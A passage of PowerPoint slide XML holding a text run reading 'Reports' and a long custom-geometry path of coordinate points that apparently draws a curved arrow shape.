                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reports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6820" y="760476"/>
            <a:ext cx="6227064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808698" y="3266285"/>
            <a:ext cx="1418590" cy="4330700"/>
            <a:chOff x="5808698" y="3266285"/>
            <a:chExt cx="1418590" cy="4330700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5808698" y="3266285"/>
              <a:ext cx="1264920" cy="4330700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="85625" y="4261004"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31777" y="4327171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116994" y="4330473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106270" y="4306724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92356" y="4306724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87022" y="4295294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98621" y="4289783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85625" y="4261004"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="98621" y="4289783"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87022" y="4295294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92356" y="4306724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103825" y="4301309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98621" y="4289783"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="103825" y="4301309"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="92356" y="4306724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106270" y="4306724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103825" y="4301309"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="155278" y="4275863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127916" y="4275863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98621" y="4289783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103825" y="4301309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133504" y="4287293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155278" y="4275863"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="247780" y="4223666"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="223420" y="4223666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175795" y="4250717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127786" y="4275925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127916" y="4275863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155278" y="4275863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181891" y="4261893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229770" y="4234715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247780" y="4223666"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="175922" y="4250590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175681" y="4250717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175922" y="4250590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="591089" y="3950743"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="573432" y="3950743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532665" y="3990240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491009" y="4028213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448464" y="4064789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405030" y="4099714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360834" y="4133115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315749" y="4164992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269902" y="4195218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223166" y="4223793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223420" y="4223666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247780" y="4223666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276760" y="4205886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322988" y="4175406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368454" y="4143275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412904" y="4109620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456592" y="4074441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499391" y="4037611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541428" y="3999384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582322" y="3959760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591089" y="3950743"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="270029" y="4195091"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269822" y="4195218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270029" y="4195091"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="315876" y="4164865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="315684" y="4164992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315876" y="4164865"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="360961" y="4132988"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360782" y="4133115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360961" y="4132988"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="405157" y="4099587"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404989" y="4099714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405157" y="4099587"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="448591" y="4064662"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="448433" y="4064789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448591" y="4064662"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="491136" y="4028086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="490989" y="4028213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491136" y="4028086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="630384" y="3909849"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="613183" y="3909849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573371" y="3950802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591089" y="3950743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622327" y="3918612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630384" y="3909849"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="668796" y="3867558"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="652045" y="3867558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613056" y="3909976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613183" y="3909849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630384" y="3909849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661443" y="3876067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668796" y="3867558"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="706168" y="3823870"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="689764" y="3823870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651918" y="3867685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652045" y="3867558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668796" y="3867558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699416" y="3832125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706168" y="3823870"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="742589" y="3778912"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726594" y="3778912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689637" y="3823997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706168" y="3823870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736500" y="3786786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742589" y="3778912"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="762281" y="3732557"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726467" y="3779039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742589" y="3778912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772441" y="3740304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777893" y="3732811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762281" y="3732811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762281" y="3732557"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="812461" y="3684932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="797079" y="3684932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762281" y="3732811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777893" y="3732811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807366" y="3692298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812461" y="3684932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="845879" y="3636164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="830734" y="3636164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796952" y="3685059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812461" y="3684932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841275" y="3643276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="845879" y="3636164"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="878120" y="3585999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="863246" y="3585999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830607" y="3636291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="845879" y="3636164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873914" y="3592857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878120" y="3585999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="909331" y="3534691"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="894615" y="3534691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863119" y="3586126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878120" y="3585999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905537" y="3541295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909331" y="3534691"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="939266" y="3482240"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="924841" y="3482240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894488" y="3534818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894615" y="3534691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909331" y="3534691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935890" y="3488463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939266" y="3482240"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="968133" y="3428646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="953924" y="3428646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924714" y="3482367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939266" y="3482240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965100" y="3434615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968133" y="3428646"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="995781" y="3373909"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981737" y="3373909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953797" y="3428773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968133" y="3428646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993040" y="3379624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995781" y="3373909"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1047536" y="3261133"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1033807" y="3261133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008407" y="3318283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981610" y="3374036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981737" y="3373909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995781" y="3373909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019964" y="3323490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045364" y="3266340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047536" y="3261133"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1008407" y="3318029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1008286" y="3318283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008407" y="3318029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1071502" y="3203348"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1057937" y="3203348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033680" y="3261260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047536" y="3261133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069621" y="3208174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071502" y="3203348"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1135839" y="3023770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1122580" y="3023770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102260" y="3084730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080797" y="3144547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057810" y="3203475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057937" y="3203348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071502" y="3203348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092735" y="3148865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114325" y="3088794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134645" y="3027707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135839" y="3023770"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1080797" y="3144420"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1102260" y="3084603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1102215" y="3084730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102260" y="3084603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1154473" y="2962048"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1141376" y="2962048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122453" y="3023897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135839" y="3023770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153441" y="2965731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154473" y="2962048"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1198834" y="2788439"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1185953" y="2788439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158775" y="2899691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141249" y="2962175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141376" y="2962048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154473" y="2962048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171094" y="2902739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1198272" y="2791233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1198834" y="2788439"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1158775" y="2899437"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1158704" y="2899691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158775" y="2899437"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1238753" y="2565427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1225958" y="2565427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208178" y="2677314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185826" y="2788693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185953" y="2788439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1198834" y="2788439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1220751" y="2679346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238531" y="2567332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238753" y="2565427"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1208178" y="2677060"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1208127" y="2677314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208178" y="2677060"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1264565" y="2231163"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1251866" y="2231163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247675" y="2342669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247607" y="2343304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239039" y="2454175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1225831" y="2565681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1225958" y="2565427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238753" y="2565427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251612" y="2455191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260375" y="2343304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264566" y="2231544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264565" y="2231163"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1239039" y="2453921"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1239009" y="2454175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239039" y="2453921"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1247675" y="2342415"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1247656" y="2342669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247675" y="2342415"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1264313" y="2120546"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1251612" y="2120546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251866" y="2231178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264565" y="2231163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264313" y="2120546"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1259772" y="2010691"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1247040" y="2010691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251612" y="2120800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251612" y="2120546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264313" y="2120546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1259772" y="2010691"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1251184" y="1901471"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1238404" y="1901471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247040" y="2010818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1259772" y="2010691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1259740" y="2009929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251184" y="1901471"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1221474" y="1686587"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1208559" y="1686587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1225577" y="1793775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238404" y="1901725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238404" y="1901471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251184" y="1901471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251104" y="1900455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238150" y="1791870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221474" y="1686587"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1225450" y="1793521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1225481" y="1793775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1225450" y="1793521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1200556" y="1581177"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1187604" y="1581177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208559" y="1686841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208559" y="1686587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221474" y="1686587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221132" y="1684428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200556" y="1581177"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1175762" y="1477291"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1162712" y="1477291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187604" y="1581431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187604" y="1581177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200556" y="1581177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200050" y="1578637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175762" y="1477291"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1147115" y="1375310"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1133883" y="1375310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162712" y="1477545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162712" y="1477291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175762" y="1477291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175031" y="1474243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147115" y="1375310"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="995586" y="988087"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981483" y="988087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981610" y="988341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025171" y="1081559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065176" y="1177317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101498" y="1275361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133883" y="1375437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147115" y="1375310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146075" y="1371627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1113436" y="1271043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076987" y="1172491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036728" y="1076352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995586" y="988087"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1101371" y="1275107"/>
                  </a:moveTo>
